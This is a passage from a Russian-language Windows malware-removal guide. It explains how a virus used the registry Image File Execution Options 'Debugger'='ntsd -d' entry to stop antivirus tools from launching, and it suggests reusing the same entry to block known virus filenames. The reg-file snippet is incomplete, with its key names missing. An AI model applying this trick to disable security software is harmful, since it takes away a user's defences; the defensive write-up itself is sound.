Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

Опасно - отладчик процесса "avz.exe"="ntsd-d"
Опасно - отладчик процесса "avguard.exe"="ntsd-d"
:.

Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением "ntsd -d" .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

Windows Registry Editor Version 5.00
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. и т.д.

Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
Service and Driver Manager - информация о службах и драйверах системы.

Простейшие способы нейтрализации вирусов в среде Windows 7 - В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.

Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .

Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.

Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.